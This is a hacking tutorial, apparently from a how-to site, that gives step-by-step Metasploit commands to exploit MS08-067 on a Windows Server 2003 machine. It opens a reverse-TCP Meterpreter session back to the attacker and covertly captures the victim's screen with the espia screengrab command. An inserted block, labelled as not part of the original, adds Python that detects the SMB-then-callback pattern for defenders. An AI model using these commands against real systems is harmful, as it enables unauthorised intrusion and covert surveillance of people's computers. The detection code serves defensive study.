Hack Like a Pro: How to Remotely Grab a Screenshot of Someone's Compromised Computer

Apr 25, 2013 04:40 PM
May 26, 2016 07:26 PM

Welcome back, my newbie hackers!

We've already saved the world from nuclear annihilation and covered our tracks afterwards, but the world is still threatened by a malicious, megalomaniacal dictator with missiles and nuclear weapons.

We need to keep a close eye on him, so in this hack, we'll install a script to periodically take a screenshot of whatever he's doing on his computer. That way we can monitor his activities and hopefully keep the world safe.


So, let's fire up Metasploit and get after this malignant, maniacal, and malicious dictator.

Step 1: Set Up the Hack

First, let's select an exploit to use. Since he's using a Windows Server 2003 system, I like to use the MS08-067 netapi exploit, so let's type:

  • msf > use exploit/windows/smb/ms08_067_netapi

To simplify our screen captures, we'll need to use Metasploit's Meterpreter payload. Let's load it into our exploit by:

  • msf > (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp

Next, we need to set our options. At this point, I like to use the "show options" command to see what options are necessary to run this hack.

  • msf > (ms08_067_netapi) show options

As you can see, we need to set the RHOST (the victim) and the LHOST (the attacker, meaning us) IP addresses. After doing this, we should be ready to take over his system.

  • msf > (ms08_067_netapi) set RHOST 192.168.1.108
  • msf > (ms08_067_netapi) set LHOST 192.168.1.109

Now, if we did everything correctly, we should be able to exploit the dictator's computer and put the Meterpreter on it, giving us total control of his computer.

  • msf > (ms08_067_netapi) exploit

As you can see, we received a Meterpreter command prompt and we're ready to roll!
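As an added defender-side example (not part of the original article): the sequence in Step 1 leaves a recognizable network footprint. The attacking host first connects to TCP/445 on the server (the SMB Server service that MS08-067 abuses), and the reverse_tcp Meterpreter payload then makes the server open a connection back to that same host. The Python below scans constructed connection-log lines for exactly that inbound-SMB-then-callback pairing. The log line format, the 60-second correlation window and the callback port 4444 (Metasploit's default LPORT, which the article never shows) are assumptions made for this example.

```python
"""Flag 'inbound SMB, then outbound callback to the same host' pairs.

Constructed connection-log format (assumed for this example):
    <ISO timestamp> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto>
"""
from datetime import datetime, timedelta

# Constructed sample log, not taken from the article. Hosts follow the
# article's lab: 192.168.1.108 is the server, 192.168.1.109 the attacker.
SAMPLE_LOG = """\
2013-04-25T16:40:01 192.168.1.50:51000 -> 192.168.1.108:445 TCP
2013-04-25T16:40:02 192.168.1.108:49152 -> 192.168.1.20:53 UDP
2013-04-25T16:40:10 192.168.1.109:41234 -> 192.168.1.108:445 TCP
2013-04-25T16:40:12 192.168.1.108:1034 -> 192.168.1.109:4444 TCP
2013-04-25T16:45:00 192.168.1.108:1035 -> 192.168.1.109:80 TCP
"""

SMB_PORT = 445
WINDOW = timedelta(seconds=60)  # assumed: how soon after SMB a callback is suspicious


def parse_line(line):
    """Split one log line into a dict of typed fields."""
    ts, src, _arrow, dst, proto = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {
        "ts": datetime.fromisoformat(ts),
        "src": src_ip, "sport": int(src_port),
        "dst": dst_ip, "dport": int(dst_port),
        "proto": proto,
    }


def find_smb_callbacks(log_text, window=WINDOW):
    """Return alerts for servers that call back to a host that just hit their SMB port.

    For every TCP flow to port 445 we remember (client, server) -> time.
    A later TCP flow from that server to that client within `window`
    is the reverse-connection pattern and is reported.
    """
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])
    smb_hits = {}   # (client_ip, server_ip) -> timestamp of the SMB connection
    alerts = []
    for e in events:
        if e["proto"] != "TCP":
            continue
        if e["dport"] == SMB_PORT:
            smb_hits[(e["src"], e["dst"])] = e["ts"]
            continue
        # Outbound flow: is the destination a host that recently hit our SMB port?
        t0 = smb_hits.get((e["dst"], e["src"]))
        if t0 is not None and timedelta(0) <= e["ts"] - t0 <= window:
            alerts.append({
                "server": e["src"],
                "client": e["dst"],
                "callback_port": e["dport"],
                "delay_s": (e["ts"] - t0).total_seconds(),
            })
    return alerts


if __name__ == "__main__":
    for a in find_smb_callbacks(SAMPLE_LOG):
        print(f"ALERT: {a['server']} called back to {a['client']}:{a['callback_port']} "
              f"{a['delay_s']:.0f}s after that host connected to SMB")
```

In the sample, 192.168.1.50 touches SMB but never receives a callback, and the 16:45 connection to port 80 falls outside the window, so only the 4444 callback two seconds after the SMB connection is reported. Port-agnostic correlation like this matters because the LPORT is attacker-chosen; matching on 4444 alone would miss a listener moved to 443.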

Step 2: Grabbing a Screenshot

Before we begin work on the malicious dictator's computer, let's find out what process ID (PID) we are using. Type:

  • meterpreter > getpid

As you can see from the screenshot, we are using the PID of 932 on the dictator's computer. Now let's check to see what process that is by getting a list of all the processes with their corresponding PIDs. Type:

  • meterpreter > ps

We can see that PID 932 corresponds to the svchost.exe process. Since we're running inside a process that has access to the interactive desktop, we're good to go. If not, we would have to migrate to a process that does, because a screenshot can only be taken from a process that can reach the active desktop.

Now all we need to do is load a built-in Meterpreter extension called espia. Simply type:

  • meterpreter > use espia

Running this command loads the espia extension into our Meterpreter session on the bad guy's computer. Now we need to grab a screenshot of his computer by typing:

  • meterpreter > screengrab

When we do this, espia grabs a screenshot of our dictator's desktop, saves it in our root user's directory on the attacking machine, and displays a copy for us.


As we can see above, we've successfully grabbed a screenshot of our bad boy's computer. Looks like he's up to no good again, checking on those Twinkies that are en route.

Photos by Nenetus/Shutterstock, Picsfive/Shutterstock
